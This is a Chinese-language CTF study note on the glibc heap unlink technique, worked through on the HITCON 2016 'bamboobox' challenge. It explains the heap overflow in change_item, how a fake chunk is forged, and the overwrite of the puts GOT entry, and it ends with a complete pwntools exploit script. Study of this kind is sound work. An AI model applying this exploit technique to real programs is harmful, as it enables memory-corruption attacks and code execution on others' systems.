【PWN-HEAP】Unlink学习笔记

题目练习

HITCON2016 bamboobox

反编译情况：

程序分析

把程序的功能阅读完成之后，发现这个程序用到一个结构体的数组用于管理结构体。
所以整理结构体如下：

struts Node{
   int size;
   char string[size];
}

从下图change_item() 中的代码可以看到，这里先输入一个长度，然后转化成int类型之后作为read读入的长度。
若输入的长度大于malloc出来的长度，则可以造成堆溢出。
这里保存chunk的指针也保存在bss段（从qword_6020C8可以看出来，或者进行动态调试也行）。

EXP编写思路

这里的核心思想是将写数据从heap变成bss，也就是说借助堆溢出伪造fake_chunk->改写人工malloc的第二个chunk头部的inused标志->free( 人工malloc的第二个chunk )来触发unlink操作->改写保存chunk的指针内容为ptr-3*8（改写到了某个函数的got表）->调用该函数 -> 任意地址读写。

首先申请3个0x80大小的chunk，填入任意字符串，之后观察heap的内容：

接下来改写Chunk0里面的内容，伪造出一个fake_chunk，顺便溢出改写Chunk1的头部。
此时ptr指针的内容如下：

紧接着Free掉Chunk1，触发unlink，向前（Chunk0）合并，然后这个时候的ptr变成如下内容

紧接着往0x6020b0里面填入数据，把0x6020b0~0x6020d0改成如下内容：
最后一个操作就是UAF的操作，修改Chunk1，实际上就变成了修改0x602020（puts函数的GOT）里面的数据。此时如果改成magic函数的地址，再调用puts函数，实际上就是调用了magic函数。
#### 完整EXP：
这里参考网络上公开的EXP，感谢这位大神~

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['terminator','-x','bash','-c']
cn = process('./bamboobox')
bin = ELF('./bamboobox')

itemlist = 0x00000000006020C0
p_chunk0 = itemlist+8

def add_item(length,name):
	cn.sendline('2')
	cn.recvuntil('the length of item name:')
	cn.sendline(str(length))
	cn.recvuntil('the name of item:')
	cn.sendline(name)

def change_item(index,length,name):
	cn.sendline('3')
	cn.recvuntil('the index of item:')
	cn.sendline(str(index))
	cn.recvuntil('the length of item name:')
	cn.sendline(str(length))
	cn.recvuntil('new name of the item:')
	cn.sendline(name)

def remove_item(index):
	cn.sendline('4')
	cn.recvuntil('the index of item:')
	cn.sendline(str(index))

def show_item():
	cn.sendline('1')
	data = cn.recvuntil('----------------------------')
	return data

add_item(256,'aaaaaaaa')#chunk0
add_item(256,'bbbbbbbb')#chunk1
add_item(256,'cccccccc')#chunk2

pay = p64(0)+p64(256+1)+p64(p_chunk0-0x18)+p64(p_chunk0-0x10)
pay += 'A'*(256-4*8)
pay += p64(256)+p64(256+0x10) + 'test'

change_item(0,len(pay),pay)

remove_item(1)

pay2 = '\x00'*0x18 + p64(p_chunk0-0x18) + p64(0) + p64(bin.got['puts'])
change_item(0,len(pay2),pay2)

change_item(1,16,p64(bin.symbols['magic']))
flag = cn.recv()

log.success("the flag is : "+flag)